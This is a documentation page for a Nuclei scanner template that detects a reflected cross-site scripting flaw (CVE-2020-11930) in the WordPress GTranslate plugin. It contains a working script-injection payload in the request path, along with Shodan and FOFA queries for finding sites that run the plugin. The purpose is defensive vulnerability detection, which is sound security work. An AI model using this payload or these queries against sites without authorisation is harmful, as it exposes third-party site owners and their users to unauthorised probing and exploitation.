Skip to content
Nuclei Templates

WordPress GTranslate <2.8.52 - Cross-Site Scripting

ID: CVE-2020-11930

Severity: medium

Author: dhiyaneshDK

Tags: cve2020,cve,wordpress,wp,xss,wp-plugin,wpscan,gtranslate

Description

Section titled “Description”

WordPress GTranslate plugin before 2.8.52 contains an unauthenticated reflected cross-site scripting vulnerability via a crafted link. This requires use of the hreflang tags feature within a sub-domain or sub-directory paid option.

YAML Source

Section titled “YAML Source”
id: CVE-2020-11930


info:
  name: WordPress GTranslate <2.8.52 - Cross-Site Scripting
  author: dhiyaneshDK
  severity: medium
  description: |
    WordPress GTranslate plugin before 2.8.52 contains an unauthenticated reflected cross-site scripting vulnerability via a crafted link. This requires use of the hreflang tags feature within a sub-domain or sub-directory paid option.
  remediation: |
    Update the WordPress GTranslate plugin to version 2.8.52 or later to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/10181
    - https://payatu.com/blog/gaurav/analysis-of-cve-2020-11930:-reflected-xss-in-gtranslate-wordpress-module
    - https://plugins.trac.wordpress.org/changeset/2245581/gtranslate
    - https://plugins.trac.wordpress.org/changeset/2245591/gtranslate
    - https://nvd.nist.gov/vuln/detail/CVE-2020-11930
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-11930
    cwe-id: CWE-79
    epss-score: 0.00303
    epss-percentile: 0.69597
    cpe: cpe:2.3:a:gtranslate:translate_wordpress_with_gtranslate:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: gtranslate
    product: translate_wordpress_with_gtranslate
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/gtranslate
    fofa-query: body=/wp-content/plugins/gtranslate
    publicwww-query: "/wp-content/plugins/gtranslate"
  tags: cve2020,cve,wordpress,wp,xss,wp-plugin,wpscan,gtranslate


http:
  - method: GET
    path:
      - '{{BaseURL}}/does_not_exist"%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E<img%20src=x'


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>'
          - 'uri-translation'
        condition: and


      - type: word
        part: header
        words:
          - "text/html"


      - type: status
        status:
          - 200
# digest: 490a00463044022061e57464d5a30e718dc59db79350c2583dff25bc17d813f3e08de5b6660bc081022002790f6f788ec9c05c0efc16a539779623f2a7e4b59ee80ce1543ab4f730ecdb:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-11930.yaml"

View on Github